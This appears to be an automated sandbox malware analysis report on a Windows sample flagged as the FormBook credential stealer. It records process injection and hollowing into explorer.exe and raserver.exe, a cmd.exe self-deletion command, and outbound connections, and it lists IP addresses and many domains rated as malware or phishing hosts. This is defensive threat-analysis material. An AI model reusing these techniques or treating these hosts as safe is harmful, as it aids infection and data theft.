              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015B09AD mov eax, dword ptr fs:[00000030h]0_2_015B09AD
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015C29A0 mov eax, dword ptr fs:[00000030h]0_2_015C29A0
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015C29A0 mov eax, dword ptr fs:[00000030h]0_2_015C29A0
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015C29A0 mov eax, dword ptr fs:[00000030h]0_2_015C29A0
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015C29A0 mov eax, dword ptr fs:[00000030h]0_2_015C29A0
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015C29A0 mov eax, dword ptr fs:[00000030h]0_2_015C29A0
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015C29A0 mov eax, dword ptr fs:[00000030h]0_2_015C29A0
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015C29A0 mov eax, dword ptr fs:[00000030h]0_2_015C29A0
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015C29A0 mov eax, dword ptr fs:[00000030h]0_2_015C29A0
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015C29A0 mov eax, dword ptr fs:[00000030h]0_2_015C29A0
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015C29A0 mov eax, dword ptr fs:[00000030h]0_2_015C29A0
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015C29A0 mov eax, dword ptr fs:[00000030h]0_2_015C29A0
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015C29A0 mov eax, dword ptr fs:[00000030h]0_2_015C29A0
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015C29A0 mov eax, dword ptr fs:[00000030h]0_2_015C29A0
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015B4859 mov eax, dword ptr fs:[00000030h]0_2_015B4859
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015B4859 mov eax, dword ptr fs:[00000030h]0_2_015B4859
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015E0854 mov eax, dword ptr fs:[00000030h]0_2_015E0854
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_0163E872 mov eax, dword ptr fs:[00000030h]0_2_0163E872
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_0163E872 mov eax, dword ptr fs:[00000030h]0_2_0163E872
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_01646870 mov eax, dword ptr fs:[00000030h]0_2_01646870
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_01646870 mov eax, dword ptr fs:[00000030h]0_2_01646870
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015C2840 mov ecx, dword ptr fs:[00000030h]0_2_015C2840
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_0165483A mov eax, dword ptr fs:[00000030h]0_2_0165483A
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_0165483A mov eax, dword ptr fs:[00000030h]0_2_0165483A
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015D2835 mov eax, dword ptr fs:[00000030h]0_2_015D2835
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015D2835 mov eax, dword ptr fs:[00000030h]0_2_015D2835
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015D2835 mov eax, dword ptr fs:[00000030h]0_2_015D2835
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015D2835 mov ecx, dword ptr fs:[00000030h]0_2_015D2835
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015D2835 mov eax, dword ptr fs:[00000030h]0_2_015D2835
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015D2835 mov eax, dword ptr fs:[00000030h]0_2_015D2835
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015EA830 mov eax, dword ptr fs:[00000030h]0_2_015EA830
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_0163C810 mov eax, dword ptr fs:[00000030h]0_2_0163C810
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_0167A8E4 mov eax, dword ptr fs:[00000030h]0_2_0167A8E4
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015DE8C0 mov eax, dword ptr fs:[00000030h]0_2_015DE8C0
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015EC8F9 mov eax, dword ptr fs:[00000030h]0_2_015EC8F9
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015EC8F9 mov eax, dword ptr fs:[00000030h]0_2_015EC8F9
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_016808C0 mov eax, dword ptr fs:[00000030h]0_2_016808C0
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015B0887 mov eax, dword ptr fs:[00000030h]0_2_015B0887
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_0163C89D mov eax, dword ptr fs:[00000030h]0_2_0163C89D
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015A8B50 mov eax, dword ptr fs:[00000030h]0_2_015A8B50
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_01646B40 mov eax, dword ptr fs:[00000030h]0_2_01646B40
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_01646B40 mov eax, dword ptr fs:[00000030h]0_2_01646B40
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015ACB7E mov eax, dword ptr fs:[00000030h]0_2_015ACB7E
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_0167AB40 mov eax, dword ptr fs:[00000030h]0_2_0167AB40
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_01658B42 mov eax, dword ptr fs:[00000030h]0_2_01658B42
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_01664B4B mov eax, dword ptr fs:[00000030h]0_2_01664B4B
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_01664B4B mov eax, dword ptr fs:[00000030h]0_2_01664B4B
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_0165EB50 mov eax, dword ptr fs:[00000030h]0_2_0165EB50
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_01682B57 mov eax, dword ptr fs:[00000030h]0_2_01682B57
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_01682B57 mov eax, dword ptr fs:[00000030h]0_2_01682B57
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_01682B57 mov eax, dword ptr fs:[00000030h]0_2_01682B57
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_01682B57 mov eax, dword ptr fs:[00000030h]0_2_01682B57
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_01678B28 mov eax, dword ptr fs:[00000030h]0_2_01678B28
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_01678B28 mov eax, dword ptr fs:[00000030h]0_2_01678B28
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_01684B00 mov eax, dword ptr fs:[00000030h]0_2_01684B00
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015DEB20 mov eax, dword ptr fs:[00000030h]0_2_015DEB20
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015DEB20 mov eax, dword ptr fs:[00000030h]0_2_015DEB20
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_0162EB1D mov eax, dword ptr fs:[00000030h]0_2_0162EB1D
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_0162EB1D mov eax, dword ptr fs:[00000030h]0_2_0162EB1D
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_0162EB1D mov eax, dword ptr fs:[00000030h]0_2_0162EB1D
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_0162EB1D mov eax, dword ptr fs:[00000030h]0_2_0162EB1D
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_0162EB1D mov eax, dword ptr fs:[00000030h]0_2_0162EB1D
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_0162EB1D mov eax, dword ptr fs:[00000030h]0_2_0162EB1D
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_0162EB1D mov eax, dword ptr fs:[00000030h]0_2_0162EB1D
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_0162EB1D mov eax, dword ptr fs:[00000030h]0_2_0162EB1D
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_0162EB1D mov eax, dword ptr fs:[00000030h]0_2_0162EB1D
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_0163CBF0 mov eax, dword ptr fs:[00000030h]0_2_0163CBF0
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015D0BCB mov eax, dword ptr fs:[00000030h]0_2_015D0BCB
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015D0BCB mov eax, dword ptr fs:[00000030h]0_2_015D0BCB
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015D0BCB mov eax, dword ptr fs:[00000030h]0_2_015D0BCB
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015B0BCD mov eax, dword ptr fs:[00000030h]0_2_015B0BCD
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015B0BCD mov eax, dword ptr fs:[00000030h]0_2_015B0BCD
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015B0BCD mov eax, dword ptr fs:[00000030h]0_2_015B0BCD
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015DEBFC mov eax, dword ptr fs:[00000030h]0_2_015DEBFC
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015B8BF0 mov eax, dword ptr fs:[00000030h]0_2_015B8BF0
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015B8BF0 mov eax, dword ptr fs:[00000030h]0_2_015B8BF0
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015B8BF0 mov eax, dword ptr fs:[00000030h]0_2_015B8BF0
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_0165EBD0 mov eax, dword ptr fs:[00000030h]0_2_0165EBD0
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_01664BB0 mov eax, dword ptr fs:[00000030h]0_2_01664BB0
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_01664BB0 mov eax, dword ptr fs:[00000030h]0_2_01664BB0
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015C0BBE mov eax, dword ptr fs:[00000030h]0_2_015C0BBE
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015C0BBE mov eax, dword ptr fs:[00000030h]0_2_015C0BBE
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_0165EA60 mov eax, dword ptr fs:[00000030h]0_2_0165EA60
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015C0A5B mov eax, dword ptr fs:[00000030h]0_2_015C0A5B
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015C0A5B mov eax, dword ptr fs:[00000030h]0_2_015C0A5B
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015B6A50 mov eax, dword ptr fs:[00000030h]0_2_015B6A50
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015B6A50 mov eax, dword ptr fs:[00000030h]0_2_015B6A50
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015B6A50 mov eax, dword ptr fs:[00000030h]0_2_015B6A50
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015B6A50 mov eax, dword ptr fs:[00000030h]0_2_015B6A50
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015B6A50 mov eax, dword ptr fs:[00000030h]0_2_015B6A50
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015B6A50 mov eax, dword ptr fs:[00000030h]0_2_015B6A50
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015B6A50 mov eax, dword ptr fs:[00000030h]0_2_015B6A50
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_0162CA72 mov eax, dword ptr fs:[00000030h]0_2_0162CA72
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_0162CA72 mov eax, dword ptr fs:[00000030h]0_2_0162CA72
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015ECA6F mov eax, dword ptr fs:[00000030h]0_2_015ECA6F
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015ECA6F mov eax, dword ptr fs:[00000030h]0_2_015ECA6F
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015ECA6F mov eax, dword ptr fs:[00000030h]0_2_015ECA6F
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015ECA38 mov eax, dword ptr fs:[00000030h]0_2_015ECA38
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015D4A35 mov eax, dword ptr fs:[00000030h]0_2_015D4A35
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015D4A35 mov eax, dword ptr fs:[00000030h]0_2_015D4A35
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_0163CA11 mov eax, dword ptr fs:[00000030h]0_2_0163CA11
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015DEA2E mov eax, dword ptr fs:[00000030h]0_2_015DEA2E
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015ECA24 mov eax, dword ptr fs:[00000030h]0_2_015ECA24
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015B0AD0 mov eax, dword ptr fs:[00000030h]0_2_015B0AD0
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015E4AD0 mov eax, dword ptr fs:[00000030h]0_2_015E4AD0
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015E4AD0 mov eax, dword ptr fs:[00000030h]0_2_015E4AD0
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_01606ACC mov eax, dword ptr fs:[00000030h]0_2_01606ACC
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_01606ACC mov eax, dword ptr fs:[00000030h]0_2_01606ACC
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_01606ACC mov eax, dword ptr fs:[00000030h]0_2_01606ACC
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015EAAEE mov eax, dword ptr fs:[00000030h]0_2_015EAAEE
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015EAAEE mov eax, dword ptr fs:[00000030h]0_2_015EAAEE
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_01606AA4 mov eax, dword ptr fs:[00000030h]0_2_01606AA4
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015E8A90 mov edx, dword ptr fs:[00000030h]0_2_015E8A90
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015BEA80 mov eax, dword ptr fs:[00000030h]0_2_015BEA80
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015BEA80 mov eax, dword ptr fs:[00000030h]0_2_015BEA80
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015BEA80 mov eax, dword ptr fs:[00000030h]0_2_015BEA80
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015BEA80 mov eax, dword ptr fs:[00000030h]0_2_015BEA80
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015BEA80 mov eax, dword ptr fs:[00000030h]0_2_015BEA80
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015BEA80 mov eax, dword ptr fs:[00000030h]0_2_015BEA80
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015BEA80 mov eax, dword ptr fs:[00000030h]0_2_015BEA80
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015BEA80 mov eax, dword ptr fs:[00000030h]0_2_015BEA80
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeProcess token adjusted: DebugJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              System process connects to network (likely due to code injection or exploit)
              Source: C:\Windows\explorer.exeNetwork Connect: 103.224.212.212 80Jump to behavior
              Source: C:\Windows\explorer.exeNetwork Connect: 104.21.34.218 80Jump to behavior
              Maps a DLL or memory area into another process
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeSection loaded: NULL target: C:\Windows\SysWOW64\raserver.exe protection: execute and read and writeJump to behavior
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeSection loaded: NULL target: C:\Windows\SysWOW64\raserver.exe protection: execute and read and writeJump to behavior
              Source: C:\Windows\SysWOW64\raserver.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
              Source: C:\Windows\SysWOW64\raserver.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
              Modifies the context of a thread in another process (thread injection)
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeThread register set: target process: 4004Jump to behavior
              Source: C:\Windows\SysWOW64\raserver.exeThread register set: target process: 4004Jump to behavior
              Queues an APC in another process (thread injection)
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
              Sample uses process hollowing technique
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeSection unmapped: C:\Windows\SysWOW64\raserver.exe base address: 880000Jump to behavior
              Source: C:\Windows\SysWOW64\raserver.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\jqPZZhDmjh.exe"Jump to behavior
              Source: explorer.exe, 00000002.00000000.2056604831.00000000013A1000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000002.3300573862.00000000013A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: IProgram Manager
              Source: explorer.exe, 00000002.00000000.2057673099.00000000048E0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2056604831.00000000013A1000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000002.3300573862.00000000013A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
              Source: explorer.exe, 00000002.00000000.2056604831.00000000013A1000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000002.3300573862.00000000013A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
              Source: explorer.exe, 00000002.00000002.3300037845.0000000000D60000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2056290643.0000000000D69000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: +Progman
              Source: explorer.exe, 00000002.00000000.2056604831.00000000013A1000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000002.3300573862.00000000013A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
              Source: explorer.exe, 00000002.00000003.3075103317.00000000098E0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979324812.00000000098AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3304893437.00000000098E3000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd31A

              Stealing of Sensitive Information

              barindex
              Yara detected FormBook
              Source: Yara matchFile source: jqPZZhDmjh.exe, type: SAMPLE
              Source: Yara matchFile source: 0.2.jqPZZhDmjh.exe.970000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.0.jqPZZhDmjh.exe.970000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000003.00000002.3301253402.00000000048EF000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2118168045.0000000000971000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.3300271936.0000000000850000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.3300130222.00000000006CB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2120646416.00000000018D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.3315542504.00000000103BF000.00000004.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000000.2050850290.0000000000971000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.3299919651.00000000004C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.3300459185.0000000004140000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2119505783.0000000001550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

              Remote Access Functionality

              barindex
              Yara detected FormBook
              Source: Yara matchFile source: jqPZZhDmjh.exe, type: SAMPLE
              Source: Yara matchFile source: 0.2.jqPZZhDmjh.exe.970000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.0.jqPZZhDmjh.exe.970000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000003.00000002.3301253402.00000000048EF000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2118168045.0000000000971000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.3300271936.0000000000850000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.3300130222.00000000006CB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2120646416.00000000018D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.3315542504.00000000103BF000.00000004.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000000.2050850290.0000000000971000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.3299919651.00000000004C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.3300459185.0000000004140000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2119505783.0000000001550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
              Shared Modules              		1
              DLL Side-Loading              		512
              Process Injection              		1
              Rootkit              		1
              Credential API Hooking              		121
              Security Software Discovery              		Remote Services1
              Credential API Hooking              		1
              Encrypted Channel              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
              DLL Side-Loading              		2
              Virtualization/Sandbox Evasion              		LSASS Memory2
              Virtualization/Sandbox Evasion              		Remote Desktop Protocol1
              Archive Collected Data              		2
              Ingress Tool Transfer              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)512
              Process Injection              		Security Account Manager2
              Process Discovery              		SMB/Windows Admin SharesData from Network Shared Drive2
              Non-Application Layer Protocol              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
              Deobfuscate/Decode Files or Information              		NTDS1
              Application Window Discovery              		Distributed Component Object ModelInput Capture12
              Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script4
              Obfuscated Files or Information              		LSA Secrets1
              File and Directory Discovery              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
              Software Packing              		Cached Domain Credentials11
              System Information Discovery              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
              DLL Side-Loading              		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              jqPZZhDmjh.exe89%ReversingLabsWin32.Trojan.FormBook
              jqPZZhDmjh.exe72%VirustotalBrowse
              jqPZZhDmjh.exe100%AviraTR/Crypt.ZPACK.Gen
              jqPZZhDmjh.exe100%Joe Sandbox ML

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              No Antivirus matches

              Domains

              SourceDetectionScannerLabelLink
              www.123bu6.shop1%VirustotalBrowse
              www.theanhedonia.com10%VirustotalBrowse
              www.truedatalab.com0%VirustotalBrowse
              www.roelofsen.online0%VirustotalBrowse
              www.soulheroes.online0%VirustotalBrowse

              URLs

              SourceDetectionScannerLabelLink
              https://word.office.comM0%URL Reputationsafe
              https://outlook.come0%URL Reputationsafe
              http://schemas.micro0%URL Reputationsafe
              https://powerpoint.office.comEMd0%URL Reputationsafe
              http://ww25.theanhedonia.com/gy14/?Szu8Zp=sJB9xXDMLUearYsOJfMPyoOL09k0Ht7qJDXT7N100%Avira URL Cloudphishing
              http://www.elbt-ag.com0%Avira URL Cloudsafe
              http://www.mrbmed.com0%Avira URL Cloudsafe
              http://www.soulheroes.onlineReferer:0%Avira URL Cloudsafe
              http://www.theanhedonia.com/gy14/www.soulheroes.online100%Avira URL Cloudmalware
              http://www.883831.com0%Avira URL Cloudsafe
              http://www.roelofsen.online100%Avira URL Cloudmalware
              http://www.elbt-ag.com/gy14/www.twinklethrive.com100%Avira URL Cloudmalware
              http://www.sgyy3ej2dgwesb5.com100%Avira URL Cloudmalware
              http://www.elbt-ag.com1%VirustotalBrowse
              http://www.venitro.com100%Avira URL Cloudmalware
              http://www.roelofsen.online0%VirustotalBrowse
              http://www.whatsapp1.autos0%Avira URL Cloudsafe
              http://www.mrbmed.com0%VirustotalBrowse
              http://www.budgetnurseries.com100%Avira URL Cloudmalware
              http://www.mtdiyx.xyz/gy14/100%Avira URL Cloudphishing
              http://www.883831.com0%VirustotalBrowse
              http://www.truedatalab.com100%Avira URL Cloudmalware
              http://www.mrbmed.com/gy14/100%Avira URL Cloudmalware
              http://www.theanhedonia.com/gy14/www.soulheroes.online9%VirustotalBrowse
              http://www.venitro.com1%VirustotalBrowse
              http://www.venitro.comReferer:0%Avira URL Cloudsafe
              http://www.ampsportss.comReferer:0%Avira URL Cloudsafe
              http://www.mtdiyx.xyz/gy14/1%VirustotalBrowse
              http://www.budgetnurseries.com0%VirustotalBrowse
              http://www.mrbmed.com/gy14/1%VirustotalBrowse
              http://www.truedatalab.com/gy14/www.budgetnurseries.com100%Avira URL Cloudmalware
              http://www.sgyy3ej2dgwesb5.com2%VirustotalBrowse
              http://www.whatsapp1.autos1%VirustotalBrowse
              http://www.artbydianayorktownva.comReferer:0%Avira URL Cloudsafe
              http://www.mtdiyx.xyzReferer:0%Avira URL Cloudsafe
              http://www.mrbmed.com/gy14/www.whatsapp1.autos100%Avira URL Cloudmalware
